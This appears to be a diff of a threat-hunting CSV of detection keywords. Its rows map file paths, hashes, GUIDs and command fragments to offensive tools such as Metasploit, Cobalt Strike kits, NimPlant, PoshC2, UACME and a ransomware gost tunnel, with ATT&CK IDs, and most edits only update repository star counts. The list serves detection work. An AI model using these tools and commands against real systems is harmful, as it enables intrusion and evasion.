","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*bypassuac-x64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bypassuac-x64.exe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bypassuac-x86.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bypassuac-x86.exe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*bypasswaf.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*bypasswaf.jar*","offensive_tool_keyword","bypasswaf","Add headers to all Burp requests to bypass some WAF products","T1090 - T1189 - T1001","TA0002 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/codewatchorg/bypasswaf","1","1","N/A","N/A","4","323","117","2018-01-28T13:13:39Z","2014-11-17T01:29:35Z" "*bypasswaf.py*","offensive_tool_keyword","bypasswaf","Add headers to all Burp requests to bypass some WAF products","T1090 - T1189 - T1001","TA0002 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/codewatchorg/bypasswaf","1","1","N/A","N/A","4","323","117","2018-01-28T13:13:39Z","2014-11-17T01:29:35Z" 
@@ -8146,7 +8293,7 @@
 "*byt3bl33d3r/gcat*","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","1","N/A","10","10","1300","466","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z"
 "*byt3bl33d3r/ItWasAllADream*","offensive_tool_keyword","ItWasAllADream","A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCE","T1046 - T1210.002 - T1047","TA0007 - TA0002","N/A","N/A","Discovery","https://github.com/byt3bl33d3r/ItWasAllADream","1","1","N/A","7","8","738","118","2023-08-25T16:11:40Z","2021-07-05T20:13:49Z"
 "*byt3bl33d3r/pth-toolkit*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
-"*byt3bl33d3r/SpamChannel*","offensive_tool_keyword","SpamChannel","poof emails from any of the +2 Million domains using MailChannels","T1566 - T1566.001","TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/SpamChannel","1","1","N/A","8","3","256","28","2023-09-21T12:25:03Z","2022-12-20T21:31:55Z"
+"*byt3bl33d3r/SpamChannel*","offensive_tool_keyword","SpamChannel","poof emails from any of the +2 Million domains using MailChannels","T1566 - T1566.001","TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/SpamChannel","1","1","N/A","8","3","257","28","2023-09-21T12:25:03Z","2022-12-20T21:31:55Z"
 "*-c /tmp/redsocks.conf*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z"
 "*-c 854A20FB-2D44-457D-992F-EF13785D2B51*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z"
 "*-c BOF.cpp -o BOF.o*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z"
@@ -8159,44 +8306,44 @@
 "*c:/users/public/creds.log*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z"
 "*C:\aab.txt*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z"
 "*c:\agent.exe*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
-"*C:\dsc_hello.txt*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","0","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z"
+"*C:\dsc_hello.txt*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","0","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z"
 "*C:\ProgramData\Prefetch\na.exe*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z"
 "*C:\ProgramData\SystemData\microsoft_Windows.dll*","offensive_tool_keyword","SysJoker","SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux","T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074","TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002","sysjocker","N/A","Exploitation tools","https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*C:\Temp\file.exe*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z"
 "*C:\Temp\poc.txt*","offensive_tool_keyword","cobaltstrike","New lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/ServiceMove-BOF","1","0","N/A","10","10","223","45","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z"
-"*c:\temp\something.ps1*","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","0","N/A","8","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z"
-"*C:\temp\tmp.tmp*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z"
+"*c:\temp\something.ps1*","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","0","N/A","8","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z"
+"*C:\temp\tmp.tmp*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z"
 "*C:\Uac\results.cab*","offensive_tool_keyword","IDiagnosticProfileUAC","UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/Wh04m1001/IDiagnosticProfileUAC","1","0","N/A","10","2","173","32","2022-07-02T20:31:47Z","2022-07-02T19:55:42Z"
-"*C:\Users\*\AppData\Roaming\Indexing.*","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*C:\Users\*\AppData\Roaming\Indexing.*","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
 "*C:\Users\*\AppData\Roaming\svchost.exe*","offensive_tool_keyword","chaos","Chaos ransomware behavior","T1486","TA0040","chaos ransomware","N/A","Ransomware","https://blog.qualys.com/vulnerabilities-threat-research/2022/01/17/the-chaos-ransomware-can-be-ravaging","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*C:\Users\Public\*.dmp*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z"
 "*c:\users\public\creds.log*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z"
 "*c:\users\public\output.txt*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z"
 "*C:\Users\Public\perm.txt*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z"
 "*C:\Users\Public\test.txt*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z"
-"*C:\Windows\DirectX.log*\Windows\Temp\backup.log*","offensive_tool_keyword","Shellcode-Loader","dynamic shellcode loading","T1055 - T1055.012 - T1027 - T1027.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ReversingID/Shellcode-Loader","1","0","N/A","10","2","139","30","2023-09-08T06:55:34Z","2021-08-08T08:53:03Z"
+"*C:\Windows\DirectX.log*\Windows\Temp\backup.log*","offensive_tool_keyword","Shellcode-Loader","dynamic shellcode loading","T1055 - T1055.012 - T1027 - T1027.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ReversingID/Shellcode-Loader","1","0","N/A","10","2","140","30","2023-09-08T06:55:34Z","2021-08-08T08:53:03Z"
 "*C:\Windows\System.exe* -L rtcp://0.0.0.0:8087/127.0.0.1:4444 -F socks5://*:*@*:443*","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","10","13872","2298","2023-09-21T04:01:17Z","2015-03-20T09:45:08Z"
-"*C:\Windows\Temp\move.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","615","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z"
-"*C:\Windows\Temp\moveme.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","615","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z"
+"*C:\Windows\Temp\move.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","616","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z"
+"*C:\Windows\Temp\moveme.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","616","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z"
 "*c:\windows\temp\test.tmp farmer*","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","308","49","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z"
 "*C??/generator.cpp*","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","751","149","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z"
-"*c0ddb8ed4e267153cd7fd2fb858e0a18fd8fa88ddc3f748bcee35372f41bec46*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*c0ddb8ed4e267153cd7fd2fb858e0a18fd8fa88ddc3f748bcee35372f41bec46*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
 "*c1090dbc-f2f7-4d90-a241-86e0c0217786*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z"
-"*c1405b280bacc7566ccd041a74461de3f8496128fd71e39368905cf8d95268f6*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
-"*C2 Client*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z"
+"*c1405b280bacc7566ccd041a74461de3f8496128fd71e39368905cf8d95268f6*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*C2 Client*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z"
 "*C2 Framework for villains*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z"
-"*C2 Nimplant Server*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z"
+"*C2 Nimplant Server*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z"
 "*C2 Server*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
-"*C2.KillDate*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*C2.KillDate*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
 "*c2.striker.*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z"
